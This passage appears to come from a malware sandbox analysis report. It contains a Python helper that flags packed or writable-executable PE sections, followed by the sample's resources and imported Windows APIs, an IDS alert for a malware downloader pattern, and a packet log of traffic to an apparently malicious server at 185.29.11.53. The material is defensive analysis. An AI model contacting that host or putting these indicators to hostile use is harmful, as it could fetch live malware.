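    off = e_lfanew + 24 + size_opt          # first IMAGE_SECTION_HEADER
    sections = []
    for _ in range(num_sections):
        name, vsize, vaddr, rsize, rptr, _r, _l, _nr, _nl, chars = SECTION_HDR.unpack_from(pe, off)
        raw = pe[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr, "virtual_size": vsize,
            "raw_size": rsize, "entropy": shannon_entropy(raw),
            "characteristics": chars,
        })
        off += SECTION_HDR.size
    return sections


def section_findings(sec: dict, high_entropy: float = 7.0, max_ratio: int = 8) -> list:
    """Heuristics; the thresholds are this example's own choice, not the report's."""
    chars = sec["characteristics"]
    flags = []
    if chars & IMAGE_SCN_MEM_EXECUTE and sec["entropy"] >= high_entropy:
        flags.append("high-entropy executable section (packed or encrypted code)")
    if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
        flags.append("writable and executable")
    if not chars & IMAGE_SCN_CNT_UNINITIALIZED_DATA and sec["raw_size"] == 0:
        flags.append("initialized section with no raw data")
    if sec["raw_size"] and sec["virtual_size"] > max_ratio * sec["raw_size"]:
        flags.append("virtual size far exceeds raw size (region filled at runtime)")
    return flags


def build_sample_pe() -> bytes:
    """Constructed PE32 stub with three sections (example data, not the sample)."""
    text_raw = bytes(range(256)) * 2   # uniform bytes -> entropy 8.0, mimics packed code
    data_raw = b"A" * 0x200            # constant bytes -> entropy 0.0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x0102)     # i386, 3 sections
    opt = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)                 # PE32 magic, rest zero

    def hdr(name, vsize, vaddr, rsize, rptr, chars):
        return SECTION_HDR.pack(name, vsize, vaddr, rsize, rptr, 0, 0, 0, 0, chars)

    secs = (
        hdr(b".text", len(text_raw), 0x1000, len(text_raw), 0x200,
            IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
        + hdr(b".data", 0x20000, 0x2000, len(data_raw), 0x400,
              IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
        + hdr(b".ndata", 0x30000, 0x22000, 0, 0,
              IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    )
    head = dos + b"PE\0\0" + coff + opt + secs
    head += b"\0" * (0x200 - len(head))      # pad headers to the first raw offset
    return head + text_raw + data_raw        # .text raw at 0x200, .data raw at 0x400


SAMPLE_PE = build_sample_pe()

if __name__ == "__main__":
    for s in parse_sections(SAMPLE_PE):
        print(f"{s['name']:<8} va=0x{s['virtual_address']:x} vsize=0x{s['virtual_size']:x} "
              f"raw=0x{s['raw_size']:x} entropy={s['entropy']:.3f} {section_findings(s)}")
```

Run against a real file by passing `open(path, "rb").read()` to `parse_sections`. The entropy is computed over the raw bytes on disk only, so a section that is empty in the file but large in memory (the .ndata pattern above) shows 0.0 and is reported by the size-ratio check rather than by entropy; that is also why the report lists 0.0 entropy and an empty-file MD5 for it.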
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x652c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.4677629244055365
RT_ICON | 0x75af0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.5025751524069791
RT_ICON | 0x7ef98 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.5306377079482439
RT_ICON | 0x84420 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.5394426074633916
RT_ICON | 0x88648 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.5737551867219917
RT_DIALOG | 0x8abf0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x8acf0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x8ae10 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x8aed8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x8af38 | 0x4c | data | English | United States | 0.8157894736842105
RT_VERSION | 0x8af88 | 0x21c | data | English | United States | 0.5388888888888889
RT_MANIFEST | 0x8b1a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T16:00:07.729876+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49720 | 185.29.11.53 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 16:00:06.822658062 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.099189043 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.099404097 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.100620031 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.105397940 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.729650021 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.729682922 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.729718924 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.729733944 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.729751110 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.729763985 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.729876041 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.730015039 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.811039925 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811064959 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811081886 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811098099 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811109066 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.811114073 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811129093 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.811130047 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811171055 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.811171055 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.811266899 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811288118 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811302900 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.811325073 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.811325073 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.811342001 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.816481113 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.816494942 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.816510916 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.816544056 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.816591978 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.891544104 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.891561031 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.891577959 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.891594887 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.891769886 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.891863108 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.891877890 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.891896963 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.891908884 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.892011881 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.897542953 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.897557974 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.897573948 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.897696018 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.897700071 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.897712946 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.897732019 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.897819996 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.897955894 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.898206949 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898221970 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898236990 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898310900 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.898349047 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.898607016 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898672104 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898684025 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.898695946 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898713112 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898730040 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.898802042 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.898844957 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.899576902 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.899679899 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.972157001 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972353935 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972368956 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972376108 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.972384930 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972400904 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972439051 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.972562075 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.972640991 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972656012 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972673893 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972690105 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.972733974 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.972785950 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.978339911 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978354931 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978378057 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978394032 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978487968 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.978487968 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.978605986 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978621960 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978646994 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978662968 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978681087 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978697062 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.978746891 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.978746891 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.978846073 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.979526043 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.979541063 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.979556084 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.979572058 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.979609966 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.979708910 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.984179020 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984193087 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984285116 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.984303951 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984319925 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984335899 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984354019 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984370947 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984386921 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.984394073 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.984455109 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.984491110 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.985224009 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.985239029 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.985347033 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.985352039 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.985441923 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.985461950 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.985517025 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.986048937 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986074924 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986093044 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986109018 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986125946 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986217022 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.986217022 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.986382961 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986397982 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986414909 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986429930 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:07.986495018 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:07.986536026 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.052654982 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052684069 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052700043 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052766085 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052783966 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052800894 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052817106 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052834034 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.052838087 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.052969933 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.059015036 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059031963 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059047937 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059066057 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059082985 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059143066 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.059199095 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.059211969 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059227943 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059245110 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059262037 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059279919 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.059334040 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.059649944 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059664011 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059679031 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059695959 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.059724092 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.059776068 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.065258026 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065273046 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065289021 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065306902 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065323114 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065336943 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.065339088 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065399885 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.065582991 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065598965 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065617085 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065660000 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.065707922 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.065742016 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065757036 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065772057 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065788984 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065805912 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.065841913 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.065920115 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.066586018 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.066660881 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.066710949 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.066781998 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.071055889 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071070910 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071089983 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071115017 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071130991 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071142912 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.071145058 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071161985 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071177959 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071232080 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.071513891 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071527958 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071552992 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071571112 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071584940 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.071588039 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071603060 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071620941 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071639061 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.071641922 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.071695089 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.072417021 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.072432995 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
